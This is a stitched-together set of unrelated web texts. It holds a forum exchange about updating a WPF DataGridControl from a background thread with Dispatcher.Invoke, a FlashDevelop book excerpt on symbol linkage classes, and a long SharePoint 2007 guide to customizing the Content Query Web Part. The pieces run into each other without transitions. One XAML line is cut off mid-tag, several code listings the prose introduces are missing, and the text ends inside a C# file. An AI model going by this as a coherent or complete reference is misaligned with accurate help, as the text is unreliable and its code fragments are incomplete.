using Microsoft.SharePoint.Publishing.WebControls;

namespace CCBQ
{
    [Guid("85b88c85-0bd0-406f-a014-471175c4c4ae")]
    public class CCBQ : ContentByQueryWebPart
    {
        [ConnectionConsumer("Filter 1 Value", "Filter1Value")]
        public void ConnectedFilter1Value(IWebPartField field)
        {
            field.GetFieldValue(delegate(object val) { FilterValue1 = (string)val; });
        }

        [ConnectionConsumer("Filter 2 Value", "Filter2Value")]
        public void ConnectedFilter2Value(IWebPartField field)
        {
            field.GetFieldValue(delegate(object val) { FilterValue2 = (string)val; });
        }

        [ConnectionConsumer("Filter 3 Value", "Filter3Value")]
        public void ConnectedFilter3Value(IWebPartField field)
        {
            field.GetFieldValue(delegate(object val) { FilterValue3 = (string)val; });
        }
    }
}
When placed on a page, you can connect this Web Part to an instance of the QueryString (URL) Filter Web Part to retrieve a value from the query string and pass it to the CQWP. It is also possible to place another filter Web Part on the page into which the user types values to filter the data returned from the CQWP.
In our scenario, by using this extended Web Part you can enable the content owners to create their own pages with custom date ranges. The result is a page that can be used for multiple seasons based on values provided by the content owners.
Replacing the Content Query Web Part with SPSiteDataQuery or Search
Although the CQWP is very powerful, it does not fit every situation. In some cases it might be necessary to use other tools, for example, in a situation that requires you to return data from several site collections. The CQWP would not work for you there because the CQWP returns information from only one site collection, so in this case you could write your own Web Part that uses multiple SPSiteDataQuery calls and aggregates the results, or you could use the powerful SharePoint Server search functionality to return results.
Deciding whether to use multiple SPSiteDataQuery calls or one search call should be based on two key factors: urgency of updates and performance. Using search requires fewer resources but suffers from a lag between when an item is published and when it is indexed by crawling. Executing multiple SPSiteDataQuery calls yields more up-to-date information, but means a higher load on the system because of the multiple calls.
If you decide that the best path is to use SPSiteDataQuery, you will find that the mapping is direct: WebsOverride corresponds to the Webs property, ListsOverride to the Lists property, QueryOverride to the Query property, and ViewFieldsOverride to the ViewFields property; these are the properties that you must set to execute an SPSiteDataQuery query. These, plus RowLimit and knowing which SPWeb object to run the query on (the WebUrl), are all that is needed to perform the query portion of the CQWP's job.
If you decide to use the search approach, there are a few more steps that you have to complete from an infrastructure perspective, but the code itself is relatively straightforward. To use the search features in SharePoint Server, the data must be set up as a managed property through the Shared Services Provider (SSP). After setting up the properties to be returned and the properties to be queried, you can execute a search and get results. For more information, see: Search Customization and Development Options in SharePoint Server 2007 and the white paper Managing Enterprise Metadata with Content Types.
If you are interested in seeing SPSiteDataQuery in action and ways that you can use the search system, see SharePoint Search Keyword and SQL Full Text Example (MSDN Code Gallery).
Conclusion
The Content Query Web Part (CQWP) is an amazingly flexible tool for querying and displaying data. From the ease of use provided by the user interface to a set of Web Part properties that enable full control of the query, caching, and display of results—the tool can be customized by the end user, business analyst, and developer. Deriving classes from the CQWP gives you the ability to add new features quickly and easily, such as data connections or paging. A fully customizable XSLT-based transformation of the query results means that you can display the results you get back. In addition, the SharePoint platform provides alternatives for those situations where the CQWP does not meet the needs of your scenario. You can make calls to the same interface that CQWP uses in the SPSiteDataQuery object, or alternatively by using the SharePoint Server search infrastructure.
Additional Resources
For more information, see the following resources:
Web Content Management Resource Center
Configuring and Customizing the Content Query Web Part
How to: Customize the Content Query Web Part by Using Custom Properties
Customizing the Content Query Web Part and Custom Item Styles
Andrew Connell's SharePoint Server 2007 WCM Links and Resources
SharePoint Content Query Web Part Examples
SharePoint Developer Center
Hi,
I just purchased the board (V2) and trying to mess around.
I followed the instructions and am playing with GPIO from Python; however, it gives me an "Invalid GPIO pin specified" error.
import mraa
x = mraa.Gpio(0)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/lib/python2.7/dist-packages/mraa.py", line 755, in __init__
    this = _mraa.new_Gpio(pin, owner, raw)
ValueError: Invalid GPIO pin specified
This is the list of GPIO.
respeaker@v2:~$ mraa-gpio list
00 GPIO91: GPIO
01 VCC:
02 GPIO43: GPIO
03 GPIO127: GPIO
04 GPIO17: GPIO
05 GPIO67: GPIO
06 GND:
07 GPIO13: GPIO
08 I2C2_SCL: I2C
09 I2C2_SDA: I2C
10 VCC:
11 GND:
12 GPIO66: GPIO
respeaker@v2:~$
Could anyone advise, please?
Thanks
GETRLIMIT(2) BSD System Calls Manual GETRLIMIT(2)
NAME
getrlimit, setrlimit -- control maximum system resource consumption

DESCRIPTION
When a soft resource limit is exceeded, a signal may be generated; this normally terminates the process, but may be caught.
When the soft cpu time limit is exceeded, a signal SIGXCPU is sent to the offending process.
RETURN VALUES
A 0 return value indicates that the call succeeded, changing or returning the resource limit. A
return value of -1 indicates that an error occurred, and an error code is stored in the global location
errno.
ERRORS
The getrlimit() and setrlimit() system calls will fail if:
[EFAULT] The address specified for rlp is invalid.
[EINVAL] resource is invalid.
The setrlimit() call will fail if:
[EINVAL] The specified limit is invalid (e.g., RLIM_INFINITY or lower than rlim_cur).
[EPERM] The limit specified would have raised the maximum limit value and the caller is not
the super-user.
LEGACY SYNOPSIS
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
The include files <sys/types.h> and <sys/time.h> are necessary.
COMPATIBILITY
setrlimit() now returns with errno set to EINVAL in places that historically succeeded. It no longer
accepts "rlim_cur = RLIM_INFINITY" for RLIM_NOFILE. Use "rlim_cur = min(OPEN_MAX, rlim_max)".
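A minimal sketch of the pattern described above: query RLIMIT_NOFILE, then raise the soft limit toward the hard limit, checking the return values as documented in RETURN VALUES. The function name is this sketch's own; on Darwin, cap the request at OPEN_MAX rather than passing RLIM_INFINITY, per the COMPATIBILITY section.

```c
#include <stdio.h>
#include <sys/resource.h>

/* Query RLIMIT_NOFILE, then raise the soft limit to the hard limit.
 * Returns 0 on success, -1 on error (errno is set by the failing call).
 * Per the COMPATIBILITY section, do not pass RLIM_INFINITY as rlim_cur
 * for RLIMIT_NOFILE; capping at the hard limit (or OPEN_MAX) is the
 * portable pattern. */
int raise_nofile_soft_limit(void)
{
    struct rlimit rl;

    if (getrlimit(RLIMIT_NOFILE, &rl) == -1)
        return -1;

    printf("soft=%llu hard=%llu\n",
           (unsigned long long)rl.rlim_cur,
           (unsigned long long)rl.rlim_max);

    rl.rlim_cur = rl.rlim_max;   /* request everything the hard limit allows */
    return setrlimit(RLIMIT_NOFILE, &rl);
}
```

A caller would invoke raise_nofile_soft_limit() and compare the result against -1, as described in RETURN VALUES.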
SEE ALSO
csh(1), sh(1), quota(2), sigaction(2), sigaltstack(2), sysctl(3), compat(5)
HISTORY
The getrlimit() function call appeared in 4.2BSD.
4th Berkeley Distribution June 4, 1993 4th Berkeley Distribution | http://developer.apple.com/documentation/Darwin/Reference/ManPages/man2/setrlimit.2.html | crawl-002 | refinedweb | 234 | 53.27 |
Hi,
I think a similar question was already asked about how to install OpenCV in a Yocto image. After doing that successfully, I tried to cross-compile a small application that reads frames from a camera. The code follows:
#include <stdlib.h>
#include <stdio.h>
#include <math.h>
#include <opencv2/core/core.hpp>
#include <opencv2/highgui/highgui.hpp>
#include <opencv2/imgproc/imgproc.hpp>
int main(int argc, char *argv[]){
if (argc < 2){
printf("Usage: cameratest cameraId \n");
return 0;
}
printf("Trying camera at port %s \n", argv[1]);
cv::VideoCapture capture = cv::VideoCapture(atoi(argv[1]));
if (capture.isOpened() == false){
printf("Could not open camera port. \n");
return -1;
}
cv::Mat frame;
int frameCount = 0;
printf("Camera test started. \n");
while(1){
if (! capture.read(frame) ){
printf("Failed reading. \n");
break;
}
printf("Read frame %d \n", frameCount);
frameCount++;
}
return 0;
}
and the CMakeLists.txt file that I'm using here:
cmake_minimum_required(VERSION 2.6)
project(camera_test)
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -std=c++0x -O3 -fsigned-char -march=armv7-a -mfpu=neon -mfloat-abi=hard")
file(GLOB_RECURSE SOURCES "src/*.cpp")
find_package(OpenCV REQUIRED)
add_executable(camera_test src/camera_test.cpp)
target_link_libraries(camera_test opencv_core opencv_ml opencv_highgui)
install(TARGETS camera_test DESTINATION /usr/bin)
~
I can create the image with this code and there is no problem, but when I try to execute it, I always get the same error:
~# camera_test 0
Trying camera at port 0
Floating point exception
There is no other error message and the code runs in my machine (native compilation) without any problem. Did someone experience this problem before? I had to patch the kernel in order to change the camera driver from mt9p032 to the mt9v032 (Phytec cameras) but I don't think this should have anything to do with it.... However, in the dmesg output I found this line:
coda 2040000.vpu: Direct firmware load for v4l-coda960-imx6q.bin failed with error -2
Could it be the problem? In that case, how can it be solved?
Best regards,
Juan
Hi Juan,
Our VPU firmware's name is vpu_fw_imx6q.bin, not v4l-coda960-imx6q.bin, so please check why that message is displayed.
Regards.
Weidong
Recommendation engines make future suggestions to a person based on their prior behavior. There are several ways to develop recommendation engines, but for our purposes we will be looking at the development of a user-based collaborative filter. This type of filter uses the ratings that other users have given to suggest future items to a user.
Making a recommendation engine in Python actually does not take much code, and it is relatively easy considering what it accomplishes. We will make a movie recommendation engine using data from MovieLens.
Below is the link for downloading the zip file
Inside the zip file are several files we will use. We will use each in a few moments. Below is the initial code to get started
import pandas as pd from scipy.sparse import csr_matrix from sklearn.decomposition import TruncatedSVD import numpy as np
We will now make 4 dataframes. Dataframes 1-3 will be the user, rating, and movie title data. The last dataframe will be a merger of the first 3. The code is below with a printout of the final result.
user = pd.read_table('/home/darrin/Documents/python/new/ml-1m/users.dat',
                     sep='::', header=None,
                     names=['user_id', 'gender', 'age', 'occupation', 'zip'],
                     engine='python')
rating = pd.read_table('/home/darrin/Documents/python/new/ml-1m/ratings.dat',
                       sep='::', header=None,
                       names=['user_id', 'movie_id', 'rating', 'timestamp'],
                       engine='python')
movie = pd.read_table('/home/darrin/Documents/python/new/ml-1m/movies.dat',
                      sep='::', header=None,
                      names=['movie_id', 'title', 'genres'],
                      engine='python')
MovieAll = pd.merge(pd.merge(rating, user), movie)
We now need to create a matrix using the .pivot_table function. This matrix holds the ratings from our "MovieAll" dataframe, with one row per user_id and one column per title. We also save the column labels in an index called "movie_index", which lets us keep track of which movie each column represents. The code is below.
rating_mtx_df = MovieAll.pivot_table(values='rating', index='user_id', columns='title', fill_value=0)
movie_index = rating_mtx_df.columns
There are many variables in our matrix, which makes the computation long and expensive. To reduce this, we will reduce the dimensions using the TruncatedSVD function, keeping 20 components. We also need to transpose the data because we want to factor the movies (the Vh side) rather than the users (the U side). All this is handled in the code below.
recomm = TruncatedSVD(n_components=20, random_state=10)
R = recomm.fit_transform(rating_mtx_df.values.T)
We saved our modified dataset as "R". If we were to print it, each row would show 20 component values that cannot be directly interpreted by us. Instead, we will move on to the actual recommendation part of this post.
To get a recommendation, you first have to tell Python which movie you watched. Python will then compare this movie with other movies that have similar ratings and genres in the training dataset, and provide recommendations based on which movies have the highest correlation to the movie that was watched.
First, we need to pull the information for just “One Flew Over the Cuckoo’s Nest” and place this in a matrix. Then we need to calculate the correlations of all our movies using the modified dataset we named “R”. These two steps are completed below.
cuckoo_idx = list(movie_index).index("One Flew Over the Cuckoo's Nest (1975)")
correlation_matrix = np.corrcoef(R)
Now we can determine which movies have the highest correlation with our movie. To do this, we must give Python a range of acceptable correlations. For our purposes, we will set this between 0.93 and 1.0. The code is below with the recommendations.
P = correlation_matrix[cuckoo_idx]
print(list(movie_index[(P > 0.93) & (P < 1.0)]))
['Graduate, The (1967)', 'Taxi Driver (1976)']
You can see that the engine recommended two movies: "The Graduate" and "Taxi Driver". We could increase the number of recommendations by lowering the correlation requirement if we desired.
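The same pipeline (build a ratings matrix, reduce it with TruncatedSVD, correlate the titles, threshold the correlations) can be sketched end to end on a tiny synthetic ratings matrix. The titles and ratings below are made up for illustration and are not from the MovieLens data:

```python
import numpy as np
from sklearn.decomposition import TruncatedSVD

# Hypothetical user-by-title ratings matrix (6 users, 4 titles).
titles = ["A", "B", "C", "D"]
ratings = np.array([
    [5, 4, 0, 1],
    [4, 5, 0, 2],
    [5, 5, 1, 0],
    [0, 1, 5, 4],
    [1, 0, 4, 5],
    [0, 0, 5, 5],
], dtype=float)

# Reduce each title (column) to a 3-component latent vector.
svd = TruncatedSVD(n_components=3, random_state=10)
R = svd.fit_transform(ratings.T)          # shape: (n_titles, 3)

# Correlate the titles in latent space and recommend neighbors of "A".
corr = np.corrcoef(R)
watched = titles.index("A")
recs = [t for i, t in enumerate(titles)
        if i != watched and corr[watched, i] > 0.9]
print(recs)
```

With the real data, the R matrix and movie_index built earlier drop in directly in place of the synthetic pieces.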
Conclusion
Recommendation engines are a great tool for generating sales automatically for customers. Understanding the basics of how to build one is a practical application of machine learning.
Introduction: How to Install Python Packages on Windows 7
For the complete and utter noob
At the time of this draft, Python 2.7 is the stable install.
23 Comments
4 years ago
Hi,
Windows 7 doesn't come with Python 2.7, and I want to install Python 2.7.13 first. How would I do this using a batch file? Assume all setups are placed in a common location.
4 years ago
I am having a problem installing Python on my PC... See my error, please, and advise me accordingly...
Thank you
4 years ago
This Instructable is out of date. Use this: it's automated with an installer, and installs a shell, too!
4 years ago
I will try to make something similar
5 years ago
Please warn people that if they forget %path%
5 years ago
It is perfect! thank you dude
5 years ago
I followed the above steps. The simplejson-3.8.1-py2.7.egg directory was created under python2.7.11 (following all the correct paths...not repeating them here again)
But on running the "import simplejson" command at the python IDLE GUI command window i am getting this error:
>>> import simplejson
Traceback (most recent call last):
File "<pyshell#2>", line 1, in <module>
import simplejson
ImportError: No module named simplejson
Please suggest a solution for this
5 years ago on Introduction
tq! this help me a lot
6 years ago on Introduction
you can also see it in the below link...
6 years ago on Introduction
you can also see it in the below link...
6 years ago on Introduction
you can also see it in the below link...
6 years ago on Introduction
Thanks for the info. I have a question:
How do I install libnss3.so for Python on Windows 7?
Can you explain this to me?
7 years ago on Introduction
Great instructions but when I try to install simplejson my virus checker tells me its a virus and deletes it. Can I progress without simplejson ??
7 years ago on Introduction
Check your environment variables and add C:\python27 or C:\python33 if you have python 3 to the path
8 years ago on Introduction
Please help when I type python setup.py.install i get the following error
'python' is not recognized as an internal or external command, operable program or batch file.
What should I do to get the package started? I am a new user and want to learn Python well.
8 years ago on Introduction
It did work fine for me with Python 3.3. Thank you PDXNAT!
-
Best Server OS so far from Microsoft - 2012 R2
I have used Windows Server from NT 3.5 to 2016, and so far the easiest to use is a close tie between 2012 R2 and 2016; 2012 R2 is still my favorite. Nice feature set, easy to use and configure.
What are the pros?
Nice and full-featured set of features. Best bang for buck in the 2012 platform.
What are the cons?
Cost
Datacenter is the way to go for virtual machines
If you run a datacenter with many virtual machines, you will probably save money by using Microsoft Windows Server Datacenter. It's the same server OS you'd get otherwise, only you can install an unlimited number of VMs and choose from the different install options for each VM.
What are the pros?
Never have to worry about the cost of spinning up a new VM.
What are the cons?
Seems pricey, but run the numbers for your environment.
Questions & Answers
Discussions tagged with this product
Hyper-V VMC stuck at begin
I'm having some annoying issue with Hyper-V.
What will happen is the following: I right click a virtual machine in Hyper-V Manager
Help build array on MD3220 w/SSD cache, high perf tier 2012 R2 failover cluster
I have 3 Dell PowerEdge R820 servers running in duplex mode, directly attached to a Dell PowerVault MD3220 and MD1220 expansion
Help create array on MD3220 w/SSD cache, high perf tier 2012 R2 failover cluster
I’m migrating drives from an existing MD3220 to a new MD3220 which has several Dell Premium Features enabled. I need some advice
R820 stuck automatic repair loop Windows Server 2012 R2 can't access cmd prmpt
After rebooting one of my R820's last night (02 FEB) Windows 2012 R2 will not load at all. After going through the normal startup
Exchange 2013: Unable to mount Database but State is constant...
Hey,
after an accident in our datacenter, we have to recover our infrastructure. Currently, we stuck on the Exchange 2013-Server.
We
Current options for 2-factor auth in AD?
Has anyone successfully deployed 2-factor to their workstations for domain login? I'm looking for experience/recommendations of
What is wrong with this powershell New-ADUser
Hi guys, I'm using this PowerShell script to create users from a .CSV file. From a list of 150 users, 32 have not been created.
An
3CX & Twilio, should be simple, right?
I've been trying to make these two things work together for a while. I can't get any outgoing calls to happen, and incoming calls
Unresponsive VM.. yet clock updates?!
Hi all,
I've been googling to try and find an answer to an issue that I've recently been presented with. Occasionally a server
AD FS 2.0 to 3.0
Well, it seems that there is no answer on this topic. But now I have an additional question. Maybe this will get people interested
HP Proliant ML10 v2 cannot boot after environmental power failure
Hi all,
I bought a HP Proliant ML10 v2 a montht ago. I installed Windows Server 2012 R2 Datacenter on it and it was working well
Server 2012 Licensing for 4 Processors
Hello, sorry if this question has been answered but according to all MS documentation, I'll need two licenses of Server 2012 R2
Hyper-V 2012 R2 Failover Cluster Major Issue
So here I am on hour who knows what dealing with this issue...
Basically we have two hosts in a Hyper-V Cluster and they will not
Misc Win10 GPO settings
I was wondering if anyone knew if there are GPO's that mimic the privacy questions you're asked when you first install Windows 10.
Time issues on a domain
I'm having time issues on my domain. In an effort to fix, I've set GPO's for the DC's to pull their time from the public NTP Pool,
Hard drive recommendations for Dell R710 running MS SQL
We have a Dell R710 that I am looking to replace the hard drives. This server hosted our MS SQL database for our NextGen EMR and
Windows Search Service - Not intended for "Enterprise"
I have a AD DFS namespace operating on a server with approximately 2.7 million files equating to 1.5TB of data, 800GB deduped.
I
Routing Problem | Portforwarding | Server connects to localhost but shouldn't
First, I apologize any spelling or grammatical mistakes and I hope that I can express myself reasonably understandable to explain
Drive Map to DFS Folder Getting Lost
We had a problem this morning with every user (about a dozen) in one of our small branch offices being unable to access a certain
New Veeam B&R Server/Repo
Hey Guys,
I have a decommissioned SuperMicro box, 2x Xeon, 32gb ram, 12 x 2tb disks direct attached.
I wish to make this my
iSCSI Errors in Windows Event Log
Well I eventually got mine running without errors and stable now for 88 days and running. This turned out to be a combination of a
System Center Licensing
Hey Guys,
I am trying to price out what I need for System Center 2012 licensing. In house we have a set up like this;Powershell
DHCP DNS issues setting up Virtual Windows 2012, 2008 DC Environment Virtualbox
I have setup a Virtual Lab in Virtualbox to simulate a Windows 2012 Primary Domain Controller and Windows 2008 Backup Domain
Weird duplication of files in Offline Folder
Hey Guys,
So I'm working on an issue where the user is working on a Windows 7 laptop with offline folders set up. The my documents
How do I replace a file once a year for all user profiles?
Hello,
Once a year, I have a database file that I need to copy to a folder within each users profile to replace last years
Virtual machines networking not working after reboot. ESXi 5.1u2
Hi all, I've got a strange one..
In our virtual center, machines that get rebooted are coming back up and not connecting to the
VLAN or Sub-Domains......that is the question
I am sure I am overthinking this but would like some advice please.
Small office with 3 locations, 20 Users. The client has a new
Terminal Server Woes
Just as a follow up. I also created a new admin user to test. I jumped on a spare machine on the branch network and logged into a
AD LDS Conifg with WordPress Site
We have recently setup a company community site using Wordpress with the Active Directory integration, which works perfectly. I
Windows Server 2012 Datacenter VM Licensing
Does anybody know whether the Windows Server 2012 Datacenter license covers all the VMs licensing too or just permit you to host
RDS on Windows Server 2012 R2
I am currently having trouble installing Remote Access and RDS onto my server that is running Windows Server 2012 R2. When
HPC Nodes between Windows Server 2008 R2 and 2012 R2?
Is it possible to create a HPC Head node on Windows Server 2012 R2 while have the compute nodes on Windows Server 2008 R2? Or
File share migration
I have to do two file server migrations in the upcoming weeks and I'm looking for the best way to do them.
One is a Server 2008
Who understands RAID, HYPER V and Server 2012
First off, why Hyper-V? I would tell you to run Citrix XenServer because it will save you about $8K. But anyway, run Server 2012
Servers scrubbed from DNS
Hello Spiceheads!
I had some "fun" yesterday. About 9:35am out of the blue all our printers went off line, and everyone lost
RDP wont work on Hyper-V Server after restart.
We had a power outage and all our server were shut down. I guess our issue probably was that the hosts were booting up at the same
Microsoft Server 2012 Datacenter Licensing
Hi Spiceheads,
I was wondering if anyone could clear up some questions I have with regards to Microsoft Server 2012 Datacentre
Server 2012R2 SMB scanning from Konica MFP
Hello Spiceheads,
We have a few Konica Minolta MFPs, the one i'm dealing with is a bizhub 223. and we also have a few Server
WSUS IIS Worker Process (w3wp.exe) Memory Usage
We've got 3 WSUS servers, a primary and 2 downstream servers, all running on 2012 R2. The server uptime on each is approximately 28
Why are Windows Server 2012 R2 Host Ping times worse than 2008 R2
Windows server 2008 R2 average 15ms while 2012 R2 average 530ms. Or what settings can be used to fix this? Just upgrading to
Windows Server 2012 R2 KMS setup
Hi,
We have recently setup a new network on Server 2012 R2 Datacenter to replace our old small business server, we are running
Windows licensing upgrade
I am writing a business case to obtain data center licensing for Windows server 2012R2 and need to outline the risks associated
Microsoft Licensing Policies
Can any one please explain me the Microsoft Licensing Policies for Servers & Virtualization ?
It is too messy and no co
How do I require SSL on IIS
Why is this so hard? I'm running windows server 2012r2 with IIS8. I am successfully hosting a website on it, however, I want to
How to Activate with MS Server R2 Datacenter Retail Key?
This key is not attached to a volume license account. Everywhere I read about this, people say they use MAK keys that are
IPv6 root hints
If I open properties on DNS manager and go to root hints, I have servers A-M, and all have IPv4 addresses.
So far, so good.
Selectively update DNS records
I'm running dual stack. Most servers have three IPv6 addresses on one NIC...one static, one RA, and one DHCPv6. I only want the
Automatically removing terminal server profiles
Has anyone come up with a clever way of removing terminal server profiles when the user is no longer in AD? I currently do it
Folder deployed on user pc via group policy
Hi
Can someone please explain how i can share a folder through group policy on my users desktop or in a specific folder , i am
Does moving to a VM change my licensing?
I have a physical server running Server 2012 R2
I'm going to P2V it before too long.
My VM server is licensed for Datacenter, so I
Projects
- Firewall Security Enhancements: I will upgrade software, audit policies, and start firewall decryption.
- VEEAM Implementation: The purpose of this project was to improve our disaster recovery plan and in turn our reaction time.
- Blue Prism 6.2 Virtualized Environment: Designed and set up a completely virtualized Blue Prism environment of 2 load balanced App servers, a...
- Veeam Backup and Replication: Installing Veeam Backup and Replication on my existing infrastructure. It is used to make VM backup a...
- FSRM File Screening for Malware: Implemented FSRM passive file screen to alert IT when file types other than typical business files w...
- Linking Office 365 with Active Directory: We want to start setting up our Office 365 subscription and Active Directory to be SSO so there is o...
- HYPER-V Failover Clustering: Set up 2 new servers as Hyper-V hosts with Failover Clustering and move all the VMs in the new HYPER...
- Malwarebytes Server Rebuild: Complete fresh rebuild of our Malwarebytes Enterprise Security product on a new server.
- HyperV Failover Pair to HA Cluster: Upgrading our HyperV host server failover pair to a 4-node cluster with StarWind VSAN shared cluster...
- New Server Room: Set up a server room with 7 machines, one router, one firewall, three gigabit switches with Windows Hy...
- Data Center Established: Construction of new datacenter, domain controller, Exchange server, cabling, IP exchange, CCTV, IBM ...
- MS Windows 2012 R2 Hyper-V: Installed 3 Hyper-V hosts including one Datacenter edition of Windows 2012 R2.
- Server Infrastructure Upgrade: The project is an upgrade from a blade environment with VMware to a hybrid-cloud environment with Sy...
- Starwind Appliance Deployment: Deploy Starwind appliances at client site. Also deploy larger class B subnet to replace 254 address ...
- Upgrading to Windows Server 2012 R2: Did an in-place upgrade of the existing servers running on Windows Server 2008 R2 to Windows Server...
- Azure Mass Storage & Storage Accounts: New to Azure; setting up a storage account and mounting it locally on internal machines.
- Infrastructure - Networking and Servers: Create default networking and server documentation. Migrate Active Directory and replication sit...
- DNS Server: Installation of Windows Server 2012 Datacenter on Hyper-V; installation of Active Directory domain s...
- Replace 10 year old physical server: Replacement of a 10 year old Dell PowerEdge server (Server 2008) with a new Dell server (T620) that ...
- Adding MDM support for schools: Adding MDM support so that we can manage domain-joined devices and mobile devices in a "single pane o...
- 2-Factor-Authentication: A customer demands higher security standards when working on their projects and therefore we need 2-...
- Hyper-V Cluster Project: The project involved migrating two stand-alone Windows Server 2008 R2 with Hyper-V servers to a thre...
- MCSA 20409B Server Virtualization project: Hands-on project for my Microsoft 20409B end of module virtualization project for my MCSA and MGIT D...
- SAS Visual Analytics Deployment: We needed a way for our constituents to be able to view customized reports on demand. SREB accumula...
- User Acceptance Testing (UAT): Bringing the three words together shows that the point of UAT is for business users to try and make ...
- Cabling the server room: Shut down all servers, remove every cable, label the cables, cable every server, switch, etc.
- WEB SERVER: Transfer all 4 websites from a shared webserver to our own Windows 2008 dedicated webserver.
- Virtual AV Server: We had well over 100 PCs with Avast! Endpoint Protection installed and no management server. It was ...
- Hyper-V Production Farm: Migrate production environment off of a mix of ESX / bare metal / Hyper-V to a consolidated, fault-t...
- Active Directory Maintenance Automation: Design and develop an automation solution to perform Active Directory maintenance.
- 3 Node Hyper-V Cluster: Build a 3-node Hyper-V Cluster for load balancing virtual machines (VMs) onto a new platform.
- New servers: We are finally replacing our Server 2003 machines with nice, shiny, new servers.
- Replace Citrix: Replace Citrix with another remote access system that is easier to support, and less resource intens...
- Low cost virtual Windows Server 2012 DC: Due to a number of clients' increased interest in upgrading and/or virtualising Windows Server 2012, I...
So my question is this. If in a header file I have a function declaration:
extern void func(void* restrict, void* restrict);
void func(void*, void*) {}
restrict
"This is so I can compile the source file in C89 mode" - Simple reason:
restrict is not a reserved keyword until C99 (see the foreword of C11; C99 is the 2nd edition), so it will just be used as a name, which is ignored in the prototype.
But both function declarators (prototype and definition) have to specify the same type, i.e. restrict is required in both.
You have to compile the header and the implementation with the correct C version. For restrict, the definition is typically more relevant than the prototype, but the compiler might be able to detect violations in the caller. Always assume relying on such hacks breaks your code.
After the comments, trying a bit of clairvoyance:
If you want to make the code compile with ancient C90, yet take advantage of newer features where useful, you can use a macro:
#if this_is_c99_or_c11
#define RESTRICT restrict
#else
#define RESTRICT
#endif

void f(int * RESTRICT p);
...
void f(int * RESTRICT p)
{
    ...
}
Still remember there can be problems cross-version compiling caller and callee. Check your target's ABI. | https://codedump.io/share/2cPYG1DiwHwe/1/specifying-pointers-as-restrict-only-in-declaration | CC-MAIN-2017-43 | refinedweb | 208 | 61.36 |
Jedi Master Yoda <yoda at dagobah.org> writes: > On Fri, 16 May 2003 23:46:23 +0200, Dirk Gerrits <dirk at gerrits.homeip.net> > spouted: > > I just saw a thread on comp.lang.lisp and comp.lang.scheme that referred > > to Common Lisp as Lisp-2 and to Scheme as Lisp-1. What gives? > > There are two families of Lisps, Common Lisp belongs to one kind and Scheme the > other. The actual difference is rather trivial, at least for outsiders. It's difficult to tell because your wording obscures what you are actually talking about, but you don't seem to have a clue. If you meant to suggest that the differences between CL and scheme are trivial you might as well have claimed that the differences between, say, C and Java are trivial (Note: I am *not* equating scheme with C or java with CL!). Lisp-1 and Lisp-2 are not aliases for scheme and CL respectively as has already been pointed out -- they refer to whether the lisp-dialect has different namespaces for variables and functions (the practice of refering to CL as a lisp-2 is a bit unfortunate anyway since it has about 7 odd namespaces). If you what you meant is that the difference between 1 namespace (lisp-1) and several namespaces (lisp-2; somewhat confusingly -- CL is more lisp-7) is trivial then the statement is less silly, but still a bit misleading -- if you'd try to to write lots of functional code in Lisp-2 you'd likely notice a practical difference to doing the same in Lisp-1. Anyway, someone interested in the pros and cons of Lisp-1/Lisp-2, the relationship between scheme and CL and the historical development of lisp can find relevant articles at <>. > However, the two camps will never be reconciled. Schemers think that > Scheme is Lisp done right, and Common Lispers think that Scheme is a > horrible abomination with not nearly enough syntax. I don't think that amongst the many complaints brought forward against scheme by CLers I've ever noticed "not nearly enough syntax" to figure prominently. 
> If I were in a particularly mischievous mood I would compare Common Lisp
> to Perl, and Scheme to Python, but then I would get flamed to a crisp. But
> I'm not, so I won't, so don't.

Good thing you didn't then, because that would only have reinforced the impression of cluelessness.

'as
EM FHPlaneHole
Description
The FHPlaneHole tool inserts a plane hole object, which represents a FastHenry uniform conductive plane hole.
FastHenry Point FHPlaneHole
FastHenry Rect FHPlaneHole
FastHenry Circle FHPlaneHole
Usage
The FHPlaneHole object can be based on the position of a Draft Point object, or you can select the 3D location of the FHPlaneHole.
- Press the EM FHPlaneHole button, or press E then H.
- Click a point on the 3D view, or type a coordinate and press the add point button.
Alternatively, you can also:
- Select one or multiple Draft Point objects.
- Press the EM FHPlaneHole button, or press E then H. One FHPlaneHole object will be created for each selected Draft Point, at the same coordinates as the Draft Points.
Remarks
FHPlaneHole objects have no meaning if they are not part of a FHPlane. To adopt a FHPlaneHole within a FHPlane, use the EM FHPlaneAddRemoveNodeHole command, or select the FHPlaneHole at FHPlane creation. To remove a FHPlaneHole from a FHPlane, you can use the EM FHPlaneAddRemoveNodeHole command.
- FHPlaneHole objects represent FastHenry plane holes, and therefore follow the same rules as the uniform conductive plane holes. In particular, holes are created by removing the internal plane nodes from the plane node array, before constructing the segment mesh. You can enable the view of the internal FHPlane nodes by turning the FHPlane DataShowNodes property on. Three types of FHPlaneHoles exist, and the type can be selected by changing the FHPlaneHole DataType property.
- Point hole: Removes the single FHPlane internal node closer to the position of the FHPlaneHole. The Point FHPlaneHole is shown as a single vertex (small dot), to help to visualize its position; see the FastHenry Point FHPlaneHole picture above.
- Rect hole: Removes all the FHPlane internal nodes that are within, as well as close to, the area defined by the base point of the FHPlaneHole and the DataLength and DataWidth properties. This means that not only the internal nodes strictly within the rectangular area defined by the FHPlaneHole are removed, but also the internal nodes outside the rectangle but within half of the internal node-to-node distance. The Rect FHPlaneHole is shown as a 2D rectangle, to help visualize its position and area; see the FastHenry Rect FHPlaneHole picture above.
- Circle hole: Removes all the FHPlane internal nodes that are within, as well as close to, the area defined by the base point of the FHPlaneHole and the DataRadius property. This means that not only the internal nodes strictly within the circular area defined by the FHPlaneHole are removed, but also the internal nodes outside the circle but within half of the internal node-to-node distance. The Circle FHPlaneHole is shown as a 2D circle, to help visualize its position and area; see the FastHenry Circle FHPlaneHole picture above. Note that if the FHPlane discretization as specified by the Dataseg1 and Dataseg2 FHPlane properties is coarse, the shape of the circular hole may not resemble a circle. This is normal, and it is how FastHenry handles circular holes, not a defect of the ElectroMagnetic Workbench for FastHenry.
Options
- To enter coordinates manually, simply enter the numbers, then press Enter between each X, Y and Z component. You can press the add point button when you have the desired values to insert the point.
- Press Esc or the Close button to abort the current command.
Properties
- DataX: the X coordinate of the FHPlaneHole
- DataY: the Y coordinate of the FHPlaneHole
- DataZ: the Z coordinate of the FHPlaneHole
- DataLength: the Rectangular hole length (along x from FHPlaneHole base point)
- DataWidth: the Rectangular hole width (along y from FHPlaneHole base point)
- DataRadius: the Circular hole radius
- DataType: the type of FastHenry plane hole. Can be "Point", "Rect" or "Circle".
